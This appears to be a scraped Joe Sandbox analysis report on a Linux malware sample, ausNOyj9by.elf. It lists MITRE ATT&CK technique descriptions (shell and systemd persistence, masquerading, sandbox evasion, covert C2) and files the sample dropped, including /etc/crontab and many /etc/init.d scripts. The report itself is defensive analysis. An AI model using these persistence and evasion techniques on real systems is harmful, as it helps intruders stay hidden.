MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User Unix Shell s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system ( `/etc` ) and the user’s home directory ( `~/` ) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation
Platforms:	Linux, macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.
Tactics:	Defense Evasion
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Creation, File: File Metadata, File: File Modification, Firmware: Firmware Modification, Process: OS API Execution, Process: Process Creation, Script: Script Execution, Service: Service Creation, User Account: User Account Creation, User Account: User Account Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.
Tactics:	Impact
Data Sources:	File: File Creation, File: File Deletion, File: File Metadata, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report ausNOyj9by.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Yara Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/.mod

/etc/.cfg

/etc/crontab

/etc/init.d/acpid

/etc/init.d/alsa-utils

/etc/init.d/anacron

/etc/init.d/apparmor

/etc/init.d/apport

/etc/init.d/avahi-daemon

/etc/init.d/binfmt-support

/etc/init.d/bluetooth

/etc/init.d/console-setup.sh

/etc/init.d/cron

/etc/init.d/cryptdisks

/etc/init.d/cryptdisks-early

/etc/init.d/cups

/etc/init.d/cups-browsed

/etc/init.d/dbus

/etc/init.d/dns-udp4

/etc/init.d/gdm3

/etc/init.d/hddtemp

/etc/init.d/hwclock.sh

/etc/init.d/irqbalance

/etc/init.d/iscsid

/etc/init.d/keyboard-setup.sh

/etc/init.d/kmod

/etc/init.d/lightdm

/etc/init.d/lm-sensors

/etc/init.d/lvm2-lvmpolld

/etc/init.d/mono-xsp4

/etc/init.d/multipath-tools

/etc/init.d/open-iscsi

Linux Analysis Report
ausNOyj9by.elf